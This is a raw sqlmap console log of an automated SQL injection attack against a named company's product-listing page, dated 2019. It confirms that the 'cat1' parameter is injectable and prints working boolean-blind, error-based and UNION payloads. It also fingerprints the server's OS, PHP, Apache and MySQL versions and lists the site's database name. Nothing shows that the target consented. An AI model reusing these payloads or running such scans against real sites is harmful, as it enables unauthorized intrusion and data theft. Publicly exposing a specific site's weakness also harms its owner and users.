http://www.scantechproducts.com/en/product-list/product-list.php?cat1=5
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.3.44#dev}
|_ -| . [,]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 02:55:26 /2019-05-25/

[?1049h[22;0;0t[1;24r(B[m[4l[?7h[24;1H[?1049l[23;0;0t[?1l>[02:55:27] [INFO] testing connection to the target URL
[02:55:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[02:55:29] [WARNING] reflective value(s) found and filtering out
[02:55:29] [INFO] testing if the target URL content is stable
[02:55:30] [INFO] target URL content is stable
[02:55:30] [INFO] testing if GET parameter 'cat1' is dynamic
[02:55:30] [INFO] GET parameter 'cat1' appears to be dynamic
[02:55:30] [INFO] heuristic (basic) test shows that GET parameter 'cat1' might be injectable (possible DBMS: 'MySQL')
[02:55:31] [INFO] heuristic (XSS) test shows that GET parameter 'cat1' might be vulnerable to cross-site scripting (XSS) attacks
[02:55:31] [INFO] testing for SQL injection on GET parameter 'cat1'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[02:55:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:56:27] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[02:59:53] [INFO] GET parameter 'cat1' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --string="LH")
[02:59:53] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[02:59:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[02:59:54] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[02:59:54] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[02:59:55] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[02:59:55] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[02:59:55] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[02:59:55] [INFO] GET parameter 'cat1' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable 
[02:59:55] [INFO] testing 'MySQL inline queries'
[02:59:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[02:59:56] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[02:59:56] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[02:59:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[02:59:56] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[02:59:56] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[02:59:57] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[02:59:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[03:00:27] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind'
[03:00:57] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (comment)'
[03:01:28] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (comment)'
[03:01:58] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[03:02:08] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[03:02:20] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[03:02:30] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[03:02:41] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query)'
[03:02:43] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query)'
[03:02:46] [INFO] testing 'MySQL <= 5.0.11 AND time-based blind (heavy query - comment)'
[03:02:48] [INFO] testing 'MySQL <= 5.0.11 OR time-based blind (heavy query - comment)'
[03:02:51] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[03:03:21] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[03:03:51] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[03:06:41] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[03:09:21] [INFO] testing 'MySQL AND time-based blind (ELT)'
[03:09:52] [INFO] testing 'MySQL OR time-based blind (ELT)'
[03:10:22] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[03:10:52] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[03:11:23] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[03:11:25] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[03:11:27] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[03:11:27] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[03:11:27] [INFO] testing 'MySQL <= 5.0.11 time-based blind - Parameter replace (heavy queries)'
[03:11:27] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[03:11:27] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[03:11:27] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[03:11:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:11:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:11:35] [INFO] target URL appears to be UNION injectable with 13 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[03:11:53] [INFO] GET parameter 'cat1' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[03:11:53] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[?1049h[22;0;0t[1;24r(B[m[4l[?7h[H[2J[24;1H[?1049l[23;0;0t[?1l>GET parameter 'cat1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 253 HTTP(s) requests:
---
Parameter: cat1 (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: cat1=-1734') OR 2553=2553-- cdNW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: cat1=5') AND (SELECT 2599 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(2599=2599,1))),0x71717a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VgIM

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: cat1=5') UNION ALL SELECT 59,59,59,59,59,59,59,59,59,59,CONCAT(0x7162786b71,0x754a68666e74494c6c4e716861765341436c6157687356466d5250616c75534b4f66755664444872,0x71717a7171),59,59-- Fuuy
---
[03:11:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: PHP 5.2.10, Apache 2.2.22
back-end DBMS: MySQL >= 5.0
[03:11:53] [INFO] fetching database names
[03:11:53] [INFO] used SQL query returns 2 entries
[03:11:54] [INFO] retrieved: 'QBXKQINFORMATION_SCHEMAQQZQQ">QBXKQINFORMATION_...
[03:11:54] [INFO] retrieved: 'QBXKQSCANTECH6QQZQQ">QBXKQSCANTECH6QQZQQ'
available databases [1]:
[*] SCANTECH6

[03:11:54] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.scantechproducts.com'

[*] ending @ 03:11:54 /2019-05-25/

